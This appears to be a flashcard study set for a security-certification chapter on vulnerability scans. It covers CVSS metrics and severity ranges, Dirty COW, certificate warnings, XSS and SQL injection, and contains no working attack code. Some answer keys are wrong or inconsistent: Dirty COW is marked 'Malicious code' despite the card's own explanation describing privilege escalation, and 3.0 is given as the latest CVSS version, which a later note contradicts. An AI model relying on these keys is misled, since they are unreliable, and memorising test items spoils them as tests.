Chap 5 - Interpreting Vulnerability Scans

Question 1

Which one of the CVSS metrics would contain information about the type of user account an attacker must use to execute an attack?

A. AV
B. C
C. PR
D. AC

Answer 1

PR

The Privileges Required (PR) vector describes whether the attacker needs no user privileges, normal user privileges, or administrative user privileges to conduct the attack. The other vectors described in this question are the Attack Vector (AV), Attack Complexity (AC), and Confidentiality (C) vectors. They would not contain information about user authentication.

Question 2

CVSS metric: AV

Answer 2

Attack Vector

Measures how the vulnerability can be exploited, such as locally or remotely over a network​.

Question 3

CVSS metric: C

Answer 3

Confidentiality

Assesses the potential impact on data confidentiality if the vulnerability is exploited

Question 4

CVSS metric: PR

Answer 4

Privileges Required

Describes the level of privileges an attacker must have to exploit the vulnerability

Question 5

CVSS metric: AC

Answer 5

Attack Complexity

Evaluates the conditions that must exist beyond the attacker’s control to exploit the vulnerability

Question 6

CVSS metric: I

Answer 6

Integrity

Evaluates the degree of alteration to data integrity an attacker might cause-

Question 7

CVSS metric: A

Answer 7

Availability

easures the potential disruption or unavailability of the system

Question 8

CVSS metric: S

Answer 8

Scope

Indicates whether the exploitation of the vulnerability can affect other components outside the original security boundary

Question 9

CVSS metric: UI

Answer 9

User Interaction

Determines whether exploiting the vulnerability requires action from another user

Question 10

What are the CVSS metrics?

Answer 10

• Attack Vector (AV): Measures how the vulnerability can be exploited, such as locally or remotely over a network
• Attack Complexity (AC): Evaluates the conditions that must exist beyond the attacker’s control to exploit the vulnerability
• Privileges Required (PR): Describes the level of privileges an attacker must have to exploit the vulnerability
• User Interaction (UI): Determines whether exploiting the vulnerability requires action from another user
• Confidentiality (C): Assesses the potential impact on data confidentiality if the vulnerability is exploited
• Integrity (I): Evaluates the degree of alteration to data integrity an attacker might cause
• Availability (A): Measures the potential disruption or unavailability of the system
• Scope (S): Indicates whether the exploitation of the vulnerability can affect other components outside the original security boundary​.

Question 11

Which one of the following values for the CVSS attack complexity metric would indicate that the specified attack is simplest to exploit?

A. High
B. Medium
C. Low
D. Severe

Answer 11

Low

An access complexity of “low” indicates that exploiting the vulnerability does not require any specialized conditions. A value of “high” indicates that specialized conditions are required. High and low are the only two possible values for this metric.

Question 12

Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?

A. N
B. A
C. H
D. L

Answer 12

H

If any of these measures is marked as H, for High, it indicates the potential for a complete compromise of the system.

N = None
L = Low

A is not used

Question 13

What is the most recent version of CVSS that is currently available?

A. 1.0
B. 2.0
C. 2.5
D. 3.0

Answer 13

3.0

Version 3.0 of CVSS is currently available and is the version described in this chapter.

in Nov 2023, v4.0 was released

Question 14

Kevin recently identified a new security vulnerability and computed its CVSS base score as 6.5. Which risk category would this vulnerability fall into?

A. Low
B. Medium
C. High
D. Critical

Answer 14

Medium

Vulnerabilities that have a CVSS base score between 4.0 and 6.9 fall into the Medium rating category.

Question 15

CVSS Score Ranges

Answer 15

• 0.0: None
• 0.1–3.9: Low
• 4.0–6.9: Medium
• 7.0–8.9: High
• 9.0–10.0: Critical

Question 16

Which one of the following is not a common source of information that may be correlated with vulnerability scan results?

A. Logs
B. Database tables
C. SIEM
D. Configuration management system

Answer 16

Database tables

It is unlikely that a database table would contain information relevant to assessing a vulnerability scan report. Logs, SIEM reports, and configuration management systems are much more likely to contain relevant information.

Question 17

The Dirty COW attack is an example of what type of vulnerability?

A. Malicious code
B. Privilege escalation
C. Buffer overflow
D. LDAP injection

Answer 17

Malicious code

In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and provided successful attackers with administrative control of affected systems.

Question 18

Dirty COW

Answer 18

Dirty COW refers to a vulnerability discovered in October 2016 in the Linux kernel, where the flaw allowed an attacker to exploit a race condition in the kernel’s handling of copy-on-write (COW) operations.

This vulnerability, which had been present in the Linux kernel for nine years, was particularly dangerous because it was easy to exploit and enabled attackers to gain administrative control over affected systems.

Adding more here so the card stops jumping

Question 19

Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?

A. Use of an untrusted CA
B. Inclusion of a public encryption key
C. Expiration of the certificate
D. Mismatch in certificate name

Answer 19

Inclusion of a public encryption key

Digital certificates are intended to provide public encryption keys and this would not cause an error. The other circumstances are all causes for concern and would trigger an alert during a vulnerability scan.

Question 20

ICS

Answer 20

Industrial Control Systems

Question 21

SCADA

Answer 21

Supervisory Control and Data Acquisition

Question 22

Monica discovers that an attacker posted a message attacking users who visit a web forum that she manages. Which one of the following attack types is most likely to have occurred?

A. SQL injection
B. Malware injection
C. LDAP injection
D. Cross‐site scripting

Answer 22

Cross‐site scripting

In a cross‐site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.

Question 23

XSS

Answer 23

Cross-Site Scripting (XSS) is a web application vulnerability where attackers inject malicious scripting code into a web page that executes in the browsers of unsuspecting users.

Question 24

Types of XSS

Answer 24

• Reflected XSS: The malicious script is reflected off a web server and executed in the user’s browser immediately
• Stored XSS: The script is permanently stored on a target server (e.g., in a database) and executed whenever the affected data is accessed
• DOM-based XSS: The malicious script is executed as a result of modifications to the Document Object Model (DOM) within the browser

Question 25

Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?

A. SQL injection
B. LDAP injection
C. Cross‐site scripting
D. Buffer overflow

Answer 25

SQL injection

In a SQL injection attack, the attacker seeks to use a web application to gain access to an underlying database. Semicolons and apostrophes are characteristic of these attacks.